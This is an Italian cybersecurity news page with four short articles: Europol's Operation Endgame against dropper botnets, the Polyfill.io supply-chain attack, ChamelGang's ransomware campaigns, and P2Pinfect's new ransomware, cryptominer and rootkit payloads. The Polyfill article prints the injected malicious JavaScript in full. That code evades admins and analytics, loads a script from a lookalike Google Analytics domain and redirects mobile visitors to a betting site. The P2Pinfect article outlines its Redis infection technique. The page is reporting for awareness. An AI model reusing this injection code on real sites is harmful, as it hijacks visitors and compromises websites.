Sicurezza Informatica
Europol Endgame: storica operazione contro Botnet malware dropper
Tempo di lettura: 3 minuti. Europol coordina la più grande operazione contro botnet, colpendo il malware dropper e rafforzando la sicurezza informatica globale.
Tra il 27 e il 29 maggio 2024, l’Operazione Endgame, coordinata dalla sede centrale di Europol, ha preso di mira i droppers tra cui IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee e Trickbot. Le azioni si sono concentrate sulla distruzione dei servizi criminali attraverso l’arresto di bersagli di alto valore, lo smantellamento delle infrastrutture criminali e il congelamento dei proventi illegali. Questo approccio ha avuto un impatto globale sull’ecosistema dei droppers. Il malware, la cui infrastruttura è stata smantellata durante i giorni di azione, ha facilitato attacchi con ransomware e altri software dannosi.
Collaborazione Internazionale Senza Precedenti
L’operazione Endgame è stata caratterizzata da una collaborazione senza precedenti tra agenzie di diverse nazioni. Europol ha coordinato gli sforzi di più di 10 paesi, unendo risorse e competenze per affrontare una delle minacce informatiche più sofisticate degli ultimi tempi. Questo approccio multilaterale ha consentito di raccogliere prove in modo più efficace e di arrestare diversi individui coinvolti nella gestione delle botnet.
Le azioni coordinate hanno portato a:
- 4 arresti (1 in Armenia e 3 in Ucraina)
- 16 ricerche di località (1 in Armenia, 1 nei Paesi Bassi, 3 in Portogallo e 11 in Ucraina)
- Oltre 100 server rimossi o interrotti in Bulgaria, Canada, Germania, Lituania, Paesi Bassi, Romania, Svizzera, Regno Unito, Stati Uniti e Ucraina
- Oltre 2 000 domini sotto il controllo delle forze dell’ordine
L’impatto sull’ecosistema del malware dropper
Il malware dropper è una tipologia di software malevolo che viene utilizzata per installare altri tipi di malware sui dispositivi infetti. Questo tipo di malware è particolarmente pericoloso perché può rimanere nascosto nei sistemi per lungo tempo, permettendo ai cybercriminali di eseguire attacchi più complessi e mirati. L’operazione di Europol ha permesso di identificare e neutralizzare numerose botnet che utilizzavano malware dropper, riducendo significativamente il numero di dispositivi infetti.
Tecniche avanzate di indagine
Le tecniche utilizzate durante questa operazione sono all’avanguardia nel campo della sicurezza informatica. Gli investigatori hanno impiegato strumenti di analisi avanzata dei dati e tecniche di cyber-forensics per tracciare i movimenti dei criminali e mappare l’intera rete di botnet. Questo ha permesso non solo di identificare gli individui coinvolti, ma anche di comprendere meglio le modalità operative delle botnet e di sviluppare strategie più efficaci per contrastarle in futuro.
Ruolo cruciale della prevenzione
Oltre alla repressione, questa operazione ha messo in luce l’importanza della prevenzione nella lotta contro il crimine informatico. Europol ha sottolineato la necessità di una maggiore consapevolezza tra gli utenti e le aziende riguardo ai rischi legati alle botnet e al malware dropper. L’educazione e la formazione sono elementi chiave per prevenire le infezioni e proteggere i dati sensibili.
Futuri sviluppi nella sicurezza informatica
L’operazione ha segnato un punto di svolta nella lotta contro le botnet, ma Europol ha dichiarato che non si fermerà qui ed ha lanciato un sito Internet appostio per l’operazione Endgame che fornirà indicazioni prossimamente. La collaborazione internazionale continuerà a essere rafforzata, e nuove operazioni sono già in fase di pianificazione. L’obiettivo è quello di creare un ambiente digitale più sicuro e di ridurre significativamente l’impatto delle minacce informatiche globali.
Nonostante il proclama dell’Europol e l’effettiva operazione che ha portato all’arresto ed al sequestro di diverse infrastrutture di rete, il ricercatore Odisseus su X segnala che un collega ha trovato in sospeso molte altre C2 attive di SystemBc Malware.
Sicurezza Informatica
Attacco alla Supply Chain di Polyfill: oltre 100.000 siti coinvolti
Tempo di lettura: 2 minuti. Attacco alla supply chain di Polyfill compromette oltre 100.000 siti, iniettando malware tramite cdn.polyfill.io.
Un attacco alla supply chain ha colpito il popolare script polyfill.js
, utilizzato da oltre 100.000 siti web per supportare browser più vecchi. Questo attacco ha compromesso il dominio e l’account GitHub di polyfill.io, iniettando malware nei siti che utilizzano questa libreria, colpendo utenti di alto profilo come JSTOR, Intuit e il World Economic Forum.
Dettagli dell’Attacco
Nel febbraio di quest’anno, una compagnia cinese ha acquistato il dominio cdn.polyfill.io
e l’account GitHub associato. Da allora, il dominio è stato utilizzato per distribuire malware sui dispositivi mobili attraverso qualsiasi sito che integra cdn.polyfill.io
. Gli utenti mobili venivano reindirizzati a un sito di scommesse sportive tramite un falso dominio di Google Analytics (www.googie-anaiytics.com
).
Aspetto | Dettagli |
---|---|
Data di Inizio | Febbraio 2024 |
Dominio Compromesso | cdn.polyfill.io |
Utenti Notabili | JSTOR, Intuit, World Economic Forum |
Metodo di Infezione | Malware iniettato dinamicamente basato su header HTTP |
Reindirizzamento | Sito di scommesse sportive |
Meccanismo dell’Attacco
Il codice di polyfill.js
è stato alterato per generare dinamicamente script malevoli basati sugli header HTTP, attivandosi su dispositivi mobili specifici a determinate ore e ignorando gli utenti amministratori o quelli monitorati da servizi di analisi web.
Esempio di Payload Malevolo
javascriptCopia codicefunction isPc() {
try {
var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" || navigator.platform == "MacIntel";
return _isMac || _isWin;
} catch (_0x44e1f6) {
return false;
}
}
function vfed_update(_0x5ae1f8) {
_0x5ae1f8 !== "" &&
loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
});
}
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();
if (_curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_hours >= 0 && _hours < 2 && _rnd <= 10) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 2 && _hours < 4 && _rnd <= 15) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 4 && _hours < 7 && _rnd <= 20) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 7 && _hours < 8 && _rnd <= 10) {
_redirectURL = _kuurzaBitGet;
} else if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
if (_redirectURL != "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1) {
vfed_update(_redirectURL);
}
}
}
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();
Alternative Sicure e Consigli
L’autore originale di Polyfill raccomanda di non utilizzare più Polyfill, poiché i browser moderni non ne hanno bisogno. Tuttavia, se è ancora necessario, sia Fastly che Cloudflare offrono alternative sicure.
Questo incidente evidenzia l’importanza di monitorare attentamente le dipendenze del software e utilizzare servizi di scansione e monitoraggio, come quelli offerti da Sansec, per proteggere le infrastrutture web dagli attacchi alla supply chain.
Sicurezza Informatica
ChamelGang: attacchi alle infrastrutture critiche con ransomware
Tempo di lettura: 2 minuti. ChamelGang attacca infrastrutture critiche con ransomware, mirato a istituzioni in India e Brasile tra il 2021 e il 2023.
ChamelGang, un gruppo APT sospettato di essere cinese, ha condotto numerosi attacchi informatici utilizzando ransomware come strumento finale per ottenere guadagni finanziari, causare disservizi, distrarre e rimuovere prove. Questi attacchi hanno preso di mira infrastrutture critiche e istituzioni governative in vari paesi.
Attività di ChamelGang
Tra il 2021 e il 2023, ChamelGang ha attaccato settori critici, inclusi istituzioni sanitarie in India e l’ufficio della Presidenza del Brasile nel 2022, utilizzando il ransomware CatB. L’attribuzione di questi attacchi non è stata rilasciata pubblicamente. Inoltre, il gruppo ha preso di mira un’organizzazione governativa in Asia orientale e un’organizzazione aeronautica nel subcontinente indiano.
Target | Dettagli |
---|---|
India | Istituto Sanitario AIIMS |
Brasile | Presidenza del Brasile |
Asia Orientale | Organizzazione governativa non specificata |
Subcontinente Indiano | Organizzazione aeronautica |
Strumenti e Tecniche
ChamelGang utilizza strumenti pubblicamente disponibili e malware personalizzati come BeaconLoader. L’uso di CatB ransomware è associato a ChamelGang grazie a sovrapposizioni nel codice, meccanismi di staging e artefatti di malware come certificati, stringhe e icone.
BestCrypt e BitLocker
Inoltre, sono stati osservati attacchi con BestCrypt e BitLocker per criptare endpoint e chiedere riscatti. Questi strumenti, legittimamente usati per la protezione dei dati, sono stati abusati per scopi malevoli, colpendo vari settori in Nord America, Sud America ed Europa, con il settore manifatturiero americano maggiormente colpito.
Strumento | Settori Colpiti |
---|---|
BestCrypt & BitLocker | Manifatturiero, Educazione, Finanza, Sanità, Legale |
Implicazioni della Cyber Espionage
L’uso strategico del ransomware da parte di attori della cyberespionage sfuma le linee tra cybercriminalità e spionaggio, complicando l’attribuzione e la risposta agli attacchi. La collaborazione continua tra forze dell’ordine e agenzie di intelligence è cruciale per migliorare la condivisione delle informazioni e la consapevolezza situazionale.
La ricerca sottolinea l’importanza di un’analisi dettagliata degli artefatti osservati e del contesto più ampio degli incidenti di ransomware. SentinelLabs, autore della ricerca, è interessato nel seguire il gruppo per trovare nuovi riscontri.
Sicurezza Informatica
P2Pinfect, da dormiente a pericoloso: nuovi payload di Ransomware e Cryptominer
Tempo di lettura: 2 minuti. P2Pinfect evolve con nuovi payload di ransomware e cryptominer. Scopri come questo malware basato su Rust sfrutta Redis e una botnet P2P per diffondersi e massimizzare i profitti degli attaccanti.
P2Pinfect è un malware basato su Rust, analizzato a fondo da Cado Security. Questo malware utilizza una botnet peer-to-peer (P2P) per il suo meccanismo di comando e controllo. Inizialmente, P2Pinfect sembrava essere in gran parte dormiente, diffondendosi principalmente attraverso Redis e un limitato spreader SSH. Tuttavia, recentemente, è stato aggiornato per includere payload di ransomware e cryptominer.
P2Pinfect è stato scoperto per la prima volta da Cado Security durante l’analisi della telemetria di honeypot nel luglio 2023. La campagna è iniziata il 23 giugno, basandosi sul certificato TLS utilizzato per le comunicazioni C2.
Accesso Iniziale
Il malware si diffonde sfruttando le funzionalità di replica in Redis. Utilizza il comando SLAVEOF per trasformare i nodi Redis scoperti in follower del server dell’attaccante. Una volta completato, l’attaccante può inviare comandi arbitrari ai nodi follower.
P2Pinfect sfrutta anche un altro vettore di accesso iniziale in Redis, abusando dei comandi di configurazione per scrivere un cron job nella directory cron.
Payload Principale
P2Pinfect è un worm, quindi tutte le macchine infette scansionano internet per trovare altri server da infettare. Dispone di un semplice password sprayer SSH, ma ha un tasso di successo inferiore rispetto a Redis. Dopo l’infezione, il malware aggiunge una chiave SSH nel file autorizzato dell’utente corrente e limita l’accesso a Redis agli IP delle connessioni esistenti.
La botnet P2Pinfect forma una grande rete mesh, permettendo al malware di propagare aggiornamenti binari attraverso il meccanismo di gossip.
Nuovi payload
Ransomware
Una volta che un nuovo peer si unisce alla botnet, P2Pinfect riceve un comando per scaricare ed eseguire un nuovo payload ransomware chiamato “rsagen”. Questo payload esegue la crittografia dei file e aggiunge una nota di riscatto.
Cryptominer
Il malware include anche un miner Monero, attivato circa cinque minuti dopo l’avvio del payload principale. Il miner è preconfigurato con il wallet Monero e il pool di mining.
Rootkit in User Mode
P2Pinfect ora include un rootkit in user mode, che modifica i file .bashrc per caricare un file libs.so.1. Questo file hijacka le chiamate a fopen, open, lstat, unlink e readdir per nascondere specifiche informazioni di processo.
P2Pinfect è un malware altamente sofisticato che continua a evolversi, aggiungendo nuove funzionalità per massimizzare i profitti degli attaccanti. Le recenti aggiunte di ransomware, cryptominer e rootkit dimostrano gli sforzi continui degli autori del malware per sfruttare l’accesso illecito e diffondere ulteriormente la rete.
- Tech1 settimana fa
Samsung Galaxy Watch 7 e Ultra: ufficiali prezzi e colori
- Smartphone1 settimana fa
Samsung: novità per Galaxy S22 e S24 Ultra
- Smartphone1 settimana fa
Redmi Note 11: Aggiornamento di Giugno 2024 con HyperOS
- Smartphone1 settimana fa
Rubati carichi di Realme GT6 e mentre Galaxy S24 FE si svela
- Smartphone1 settimana fa
Novità Samsung A25, Galaxy Buds 3 e Wear OS
- Smartphone1 settimana fa
Samsung One UI 7.0 a ottobre e aggiornamenti per Galaxy S23 e S21 FE
- Smartphone1 settimana fa
Samsung Galaxy A24, A53 5G e S24 ricevono aggiornamenti importanti
- Smartphone1 settimana fa
Confronto Xiaomi 14 Civi vs Motorola Edge 50 Ultra: quale scegliere?